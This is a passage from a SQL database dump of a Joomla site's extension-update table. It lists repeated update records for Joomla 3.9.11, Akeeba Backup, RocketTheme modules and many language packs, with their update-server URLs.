package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2904,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2905,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2906,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2907,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2908,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2909,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2910,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2911,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2912,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2913,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2914,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2915,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2916,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2917,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2918,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2919,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2920,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2921,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2922,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2923,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2924,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2925,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2926,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2927,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2928,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2929,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2930,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2931,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2932,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2933,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2934,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2935,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2936,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2937,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2938,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2939,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2940,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2941,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2942,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2943,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2944,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2945,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(2946,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2947,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2948,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2949,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2950,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2951,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2952,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2953,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2954,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2955,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2956,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2957,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2958,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2959,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2960,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2961,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2962,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2963,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2964,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2965,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2966,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2967,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2968,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2969,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2970,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2971,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2972,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2973,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2974,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2975,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2976,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2977,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2978,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2979,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2980,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(2981,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(2982,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(2983,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2984,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2985,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2986,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2987,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2988,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2989,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2990,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2991,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2992,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2993,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(2994,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2995,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2996,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2997,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2998,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2999,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3000,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3001,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3002,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3003,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3004,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3005,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3006,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3007,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3008,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3009,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3010,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3011,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3012,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3013,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3014,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3015,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3016,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3017,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3018,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3019,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3020,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3021,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3022,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3023,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3024,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3025,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3026,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3027,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(3028,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.5','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3076',''),(3030,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3031,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3032,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3033,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3034,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3035,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3036,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3037,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3038,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3039,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3040,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3041,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3042,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3043,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3044,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3045,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3046,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3047,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3048,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3049,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3050,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3051,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3052,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3053,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3054,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3055,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3056,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3057,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3058,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3059,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3060,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3061,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3062,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3063,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3064,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3065,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3066,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3067,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3068,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3069,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3070,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3071,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3072,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3073,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3074,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3075,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3076,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3077,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3078,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3079,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(3080,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(3081,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(3082,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3083,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3084,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3085,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3086,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3087,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3088,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3089,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3090,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3091,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3092,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3093,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3094,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3095,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3096,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3097,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3098,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3099,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3100,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3101,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3102,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3103,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3104,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3105,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3106,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3107,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3108,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3109,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3110,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3111,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3112,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3113,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3114,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3115,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3116,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3117,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3118,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3119,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3120,57,0,'German 